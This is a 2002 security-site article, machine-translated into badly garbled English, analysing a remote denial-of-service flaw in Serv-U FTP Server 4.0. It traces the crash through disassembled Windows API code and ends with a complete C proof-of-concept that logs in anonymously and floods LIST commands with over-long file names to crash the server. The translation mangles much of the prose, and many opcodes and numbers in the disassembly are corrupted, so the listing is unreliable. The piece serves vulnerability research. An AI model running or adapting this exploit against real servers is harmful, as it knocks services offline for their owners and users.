Serv-U long-distance refuses to serve the loophole as well as the reason analyzes |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  The hacker file>>invasion analyzes>>Serv-U long-distance to 
                  refuse to serve the loophole as well as the reason analysis  
                  Printing

            Serv-U long-distance refuses to serve the loophole as well as the 
            reason analysis
            Www.cshu.net  2002-8-18  fog rain village 

              And procedure edition: 
              Serv-U FTP Server v4.0.0.4 (the before edition also possibly had 
              this loophole, has not tested) 
              Loophole type: 
              Long-distance refuses to serve 
              Loophole description: 
              Most recent several days used RhinoSoft product Serv-U FTP, the 
              feeling have been also good, simple 
              Has tested its security, sends now lands after the anonymous user, 
              transmits LIST NNNN.. Order, 
              The heel character quantity achieved when 253 bytes, the service 
              end newspaper is wrong, and the wrong dialog box is unable to 
              close, 
              Only can again open Serv-U the FTP service only then to be good. 
              Because is creates by the long character string, I as soon as 
              start also to think is the overflow and so on loophole. Afterwards 

              After the thorough analysis program assembly code, discovered this 
              is not the general overflow, even may say is not 
              Serv-U itself procedure question, but is WIN32 API design BUG. 
              GetFullPathNameA this API uses for to gain assigns the document 
              the way, but it is processing 
              When long filename had not considered the good boundary condition, 
              creates the memory address which possibly visits does not exist, 
              Created in the Serv-U example has refused to serve the attack. 
              Originally common picture this kind of visit does not exist 
              The memory loophole, the procedure exception handling all may 
              return restores, as for does not create the procedure collapse, 
              But is precisely because this question is, but is not application 
              procedure itself which makes a mistake by system DLL creates 
              Question, therefore the application procedure exception handling 
              example regulation is unable correctly to deal with this issue, 
              thus caused 
              The service end procedure collapses. 
              Not merely is the LIST order is affected this loophole, all heels 
              parameter is the filename order all has 
              This question, for example MDTM and so on. Moreover triggers this 
              loophole the string length acts according to the ftp root table of 
              contents 
              Behind establishes, I which different decides write a procedure to 
              test this loophole, the procedure see. 
              Because this loophole is unable to use for to obtain the 
              jurisdiction, therefore also is disinclined to report BUGTRAQ came 
              up, 
              But analyzes the loophole the process or to let me a little 
              harvest, had known at least in the programming which places are 
              the regulations 
              The foreword is easy to neglect creates the security loophole the 
              place, Microsoft's programmer also same  such mistake. 

              Procedure analysis: 
              Under is through finished to this procedure counter- assembly code 
              analysis creates this loophole the reason. 
              Because instead assembles the code has several dozens M to be big, 
              analysis time unavoidably makes a mistake, asks respectfully each 
              discovery 
              Question comrade pointed out. 
              Serv-U is accepting LIST NNN.. After the order carries on 
              processing to the filename under, can enter 
              This section of procedures: 
              * Referenced by a CALL at Addresses: 
              |:005A4A8F,:005A4C97 
              | 
              :005A338C 55 push ebp 
              :005A338D 8BEC mov ebp, esp 
              :005A338F 83C4F8 add esp, FFFFFFF8 
              :005A3392 53 push ebx 
              :005A3393 56 push esi 
              :005A3394 57 push edi 
              :005A3395 8B7D08 mov edi, dword ptr [ ebp+08 ] 
              :005A3398 6.80401 billion push 00.000104 million 
              :005A339D E802F9FEFF call 00592CA4 
              :005A33A2 59 pop ecx 
              :005A33A3 8BD8 mov ebx, eax 
              :005A33A5 85C0 test eax, eax 
              :005A33A7 7,507 jne 005A33B0 
              :005A33A9 33C0 xor eax, eax 
              :005A33AB E9A9000000 jmp 005A3459 
              * Referenced by a (U) nconditional or (C) onditional Jump at 
              Address: 
              |:005A33A7 (C) 
              | 
              :005A33B0 8D55FC lea edx, dword ptr [ ebp-04 ] 
              :005A33B3 52 push edx 
              :005A33B4 53 push ebx 
              :005A33B5 6.80401 billion push 00.000104 million 
              :005A33BA 8B4D0C mov ecx, dword ptr [ ebp+0C ] 
              :005A33BD 51 push ecx; Here is ftp adds on the LIST parameter with 
              the table of contents 
              * Reference To: KERNEL32.GetFullPathNameA, Ord:0000h 
              | 
              :005A33BE E89F630100 Call 005B9762; Transfers GetFullPathNameA 
              ; 
              ------------------------------------------------------------------------------------------- 

              ; Transfers to Kernel32.dll in the GetFullPathNameA function 
              Exported fn (): GetFullPathNameA - Ord:012Ah 
              :77E80DBD 55 push ebp 
              :77E80DBE 8BEC mov ebp, esp 
              :77E80DC0 83EC24 sub esp, 00.000024 million 
              :77E80DC3 53 push ebx 
              :77E80DC4 56 push esi 
              :77E80DC5 8B7514 mov esi, dword ptr [ ebp+14 ] 
              :77E80DC8 33DB xor ebx, ebx 
              :77E80DCA F7DE neg esi 
              :77E80DCC 57 push edi 
              :77E80DCD 8D45FC lea eax, dword ptr [ ebp-04 ] 
              :77E80DD0 FF7508 push [ ebp+08 ] 
              :77E80DD3 895DF8 mov dword ptr [ ebp-08 ], ebx 
              :77E80DD6 1BF6 sbb esi, esi 
              :77E80DD8 23F0 and esi, eax 
              :77E80DDA 8D45EC lea eax, dword ptr [ ebp-14 ] 
              :77E80DDD 50 push eax 
              :77E80DDE E81E89FEFF call 77E69701 
              :77E80DE3 85C0 test eax, eax 
              :77E80DE5 0F84039C0000 je 77E8A9EE 
              :77E80DEB 64A118000000 mov eax, dword ptr fs: [ 00.000018 million 
              ] 
              :77E80DF1 8B4030 mov eax, dword ptr [ eax+30 ] 
              :77E80DF4 BF0A020000 mov edi, 0000020A; The length limit, is not 
              correct! ! ! 
              ; Here 0x20A is an assignment pile of size, simultaneously also 
              behind took judges RtlGetFullPathName_U 
              ; Returns to the length the comparison length limit 
              :77E80DF9 57 push edi 
              :77E80DFA FF35B0F7EB77 push dword ptr [ 77EBF7B0 ] 
              :77E80E00 FF7018 push [ eax+18 ] 
              ; Assigns the 0x20A byte the memory to pile 
              * Reference To: NTDLL.RtlAllocateHeap, Ord:014Ah 
              | 
              :77E80E03 FF150410E677 Call dword ptr [ 77E61004 ] 
              :77E80E09 3BC3 cmp eax, ebx 
              :77E80E0B 8945F4 mov dword ptr [ ebp-0C ], eax 
              :77E80E0E 0F84C69B0000 je 77E8A9DA 
              :77E80E14 56 push esi 
              :77E80E15 50 push eax 
              :77E80E16 6.80802 billion push 00.000208 million 
              :77E80E1B FF75F0 push [ ebp-10 ] 
              ; RtlGetFullPathName_U uses for to obtain the way the UNICODE 
              character string, this function is limits by the length, 
              ; When the length is bigger than 0x208 time is unable correctly to 
              obtain the way, namely is unable the correct copy string to ebp-0C 
              in. 
              * Reference To: NTDLL.RtlGetFullPathName_U, Ord:01E7h 
              | 
              :77E80E1E FF15AC10E677 Call dword ptr [ 77E610AC ] 
              :77E80E24 3BC7 cmp eax, edi; This judgement is not right, should 
              jump to wrongly processes! 
              ; But because the front limit is 0x20A, therefore when with 0x20A 
              long character string time can judge makes a mistake, 
              ; Cannot enter wrongly processes behind, but is continues to not 
              to obtain the content a pile of memory to carry on the operation, 
              ; This is a root which makes a mistake 
              :77E80E26 894,508 mov dword ptr [ ebp+08 ], eax 
              :77E80E29 0F87CC9B0000 ja 77E8A9FB 
              * Reference To: NTDLL.RtlUnicodeToMultiByteSize, Ord:0294h 
              | 
              :77E80E2F 8B356010E677 mov esi, dword ptr [ 77E61060 ] 
              :77E80E35 50 push eax 
              :77E80E36 FF75F4 push [ ebp-0C ] 
              :77E80E39 8D4508 lea eax, dword ptr [ ebp+08 ] 
              :77E80E3C 50 push eax 
              :77E80E3D FFD6 call esi; Call RtlUnicodeToMultiByteSize 
              :77E80E3F 3BC3 cmp eax, ebx 
              :77E80E41 0F8CAE9B0000 jl 77E8A9F5 
              :77E80E47 395D08 cmp dword ptr [ ebp+08 ], ebx 
              :77E80E4A 0F8491000000 je 77E80EE1 
              :77E80E50 395D14 cmp dword ptr [ ebp+14 ], ebx 
              :77E80E53 7,420 je 77E80E75 
              :77E80E55 8B45FC mov eax, dword ptr [ ebp-04 ] 
              :77E80E58 3BC3 cmp eax, ebx 
              :77E80E5A 7,419 je 77E80E75 
              :77E80E5C 2B45F4 sub eax, dword ptr [ ebp-0C ] 
              :77E80E5F D1F8 sar eax, 1 
              :77E80E61 D1E0 shl eax, 1 
              :77E80E63 50 push eax 
              :77E80E64 8D45F8 lea eax, dword ptr [ ebp-08 ] 
              :77E80E67 FF75F4 push [ ebp-0C ] 
              :77E80E6A 50 push eax 
              :77E80E6B FFD6 call esi; Call RtlUnicodeToMultiByteSize---- makes 
              a mistake! ! ! 
              ; 2nd time transfers RtlUnicodeToMultiByteSize time can appear the 
              above mistake 
              :77E80E6D 3BC3 cmp eax, ebx 
              :77E80E6F 0F8C809B0000 jl 77E8A9F5 
              ; 
              ------------------------------------------------------------------------------------------- 

              Last call esi transfers here 
              Exported fn (): RtlUnicodeToMultiByteSize - Ord:0296h 
              :77F83EA4 8B44240C mov eax, dword ptr [ esp+0C ] 
              :77F83EA8 56 push esi 
              :77F83EA9 33F6 xor esi, esi 
              :77F83EAB D1E8 shr eax, 1 
              :77F83EAD 803D14F3FC7700 cmp byte ptr [ 77FCF314 ], 00 
              :77F83EB4 0F8598D30100 jne 77FA1252; Can change to 77FA1252 to 
              carry out 
              :77F83EBA 8B4C2408 mov ecx, dword ptr [ esp+08 ] 
              :77F83EBE 8,901 mov dword ptr [ ecx ], eax 
              :77F83EC0 33C0 xor eax, eax 
              :77F83EC2 5E pop esi 
              :77F83EC3 C20C00 ret 000C 
              ; 
              ------------------------------------------------------------------------------------------- 

              Jumps here 
              * Referenced by a (U) nconditional or (C) onditional Jump at 
              Address: 
              |:77F83EB4 (C) 
              | 
              :77FA1252 8BC8 mov ecx, eax 
              :77FA1254 48 dec eax 
              :77FA1255 85C9 test ecx, ecx 
              :77FA1257 7,424 je 77FA127D 
              :77FA1259 8B4C240C mov ecx, dword ptr [ esp+0C ] 
              :77FA125D 57 push edi 
              :77FA125E 8D7801 lea edi, dword ptr [ eax+01 ] 
              * Referenced by a (U) nconditional or (C) onditional Jump at 
              Address: 
              |:77FA127A (C) 
              | 
              :77FA1261 0FB701 movzx eax, word ptr [ ecx ] 
              ; Here can unceasingly have a circulation to take ecx the value, 
              also is front RtlAllocateHeap assignment that pile, 
              ; Because front that pile of in not correct depositing content, 
              therefore can create does not jump out the circulation, thus 
              continuously takes 
              ; The memory page does not exist the place, namely 0x00152000 
              (also possibly is other value, by piles address to decide). 
              :77FA1264 8B155404FD77 mov edx, dword ptr [ 77FD0454 ] 
              :77FA126A 41 inc ecx 
              :77FA126B 41 inc ecx 
              :77FA126C 668B0442 mov ax, word ptr [ edx+2*eax ] 
              :77FA1270 33D2 xor edx, edx 
              :77FA1272 8AD4 mov dl, ah 
              :77FA1274 84D2 test dl, dl 
              :77FA1276 7,510 jne 77FA1288 
              :77FA1278 46 inc esi 
              * Referenced by a (U) nconditional or (C) onditional Jump at 
              Address: 
              |:77FA128A (U) 
              | 
              :77FA1279 4F dec edi 
              :77FA127A 75E5 jne 77FA1261 
              :77FA127C 5F pop edi 
              * Referenced by a (U) nconditional or (C) onditional Jump at 
              Address: 
              |:77FA1257 (C) 
              | 
              :77FA127D 8B442408 mov eax, dword ptr [ esp+08 ] 
              :77FA1281 8,930 mov dword ptr [ eax ], esi 
              :77FA1283 E9382CFEFF jmp 77F83EC0 
              * Referenced by a (U) nconditional or (C) onditional Jump at 
              Address: 
              |:77FA1276 (C) 
              | 
              :77FA1288 46 inc esi 
              :77FA1289 46 inc esi 
              :77FA128A EBED jmp 77FA1279 
              Loophole test order: 
              /* 
              Serv-U FTP Server 4.0 remote DoS 
              By isno (isno@xfocus.org) 
              */ 
              #include <stdio.h> 
              #include <winsock.h> 
              #pragma comment (lib, "Ws2_32") 
              Void main (int argc, char *argv [ ]) 
              { 
              //anonymous ftp user and passwd 
              Char user [ ] = "USER ftp\r\n"; 
              Char pass [ ] = "PASS bug@rhinosoft.com\r\n"; 
              Char buff [ 1,024 ]; 
              Int s, i; 
              Struct hostent *ht; 
              Struct sockaddr_in sin; 
              WSADATA WSAData; 

              If (argc! = 2) 
              { 
              Printf ("Usage: %s host\r\n ", argv [ 0 ]); 
              Exit (0); 
              } 
              If (WSAStartup (MAKEWORD (1,1), &WSAData)! = 0) 
              { 
              Printf ("WSAStartup failed. \n"); 
              WSACleanup (); 
              Exit (1); 
              } 
              If ((ht = gethostbyname (argv [ 1 ])) == 0) 
              { 
              Printf ("cannot resolve %s\n", argv [ 1 ]); 
              Exit (1); 
              } 
              Sin.sin_port = htons (21); 
              Sin.sin_family = AF_INET; 
              Sin.sin_addr = * ((struct in_addr *) ht->h_addr); 
              If ((s = socket (AF_INET, SOCK_STREAM, 0)) == -1) 
              { 
              Printf ("cannot setup socket\r\n"); 
              Exit (1); 
              } 
              If ((connect (s, (struct sockaddr *) &sin, sizeof (sin))) == -1) 
              { 
              Printf ("cannot connect\r\n"); 
              Exit (1); 
              } 
              Memset (buff,0, sizeof (buff)); 
              If (recv (s, buff, 200, 0) == -1) 
              { 
              Printf ("cannot recv\r\n"); 
              Exit (1); 
              } 
              Printf ("%s\r\n", buff); 
              Printf ("%s\r\n", user); 
              Memset (buff,0, sizeof (buff)); 
              If (send (s, user, strlen (user), 0) == -1) 
              { 
              Printf ("cannot send\r\n"); 
              Exit (1); 
              } 
              Memset (buff,0, sizeof (buff)); 
              If (recv (s, buff, 200, 0) == -1) 
              { 
              Printf ("cannot recv\r\n"); 
              Exit (1); 
              } 
              Printf ("%s\r\n", buff); 
              Printf ("%s\r\n", pass); 
              Memset (buff,0, sizeof (buff)); 
              If (send (s, pass, strlen (pass), 0) == -1) 
              { 
              Printf ("cannot send\r\n"); 
              Exit (1); 
              } 
              Memset (buff,0, sizeof (buff)); 
              If (recv (s, buff, 200, 0) == -1) 
              { 
              Printf ("cannot recv\r\n"); 
              Exit (1); 
              } 
              Printf ("%s\r\n", buff); 

              //try long para from 200 to 300 bytes 
              For (i=200; I<300; I++) 
              { 
              Printf ("send LIST NNN... (%d bytes) \r\n", i); 
              Memset (buff,0, sizeof (buff)); 
              Memcpy (buff, "LIST",5); 
              Memset (buff+5,0x4e, i); 
              Memcpy (buff+5+i, "\r\n",2); 
              If (send (s, buff, strlen (buff), 0) == -1) 
              { 
              Printf ("cannot send\r\n"); 
              Exit (1); 
              } 
              Memset (buff,0, sizeof (buff)); 
              If (recv (s, buff, 200, 0) == -1) 
              { 
              Printf ("0verflow! \r\n"); 
              Return; 
              } 
              } 
              Closesocket (s); 
              Printf ("target is not vuln\r\n"); 
              Return; 
              } 



              Original author: Isno 
              Origin: Security focal point 
              Altogether has 56 readers to read this article 

              [Tells friend] 
            Previous article:Overflow procedure compilation skill 

            Next article:Hacking CGI 

            - this week popular article - related article 
            Serv-U long-distance refuses to serve the loophole as well as the 
            reason analysis



      CSHU 
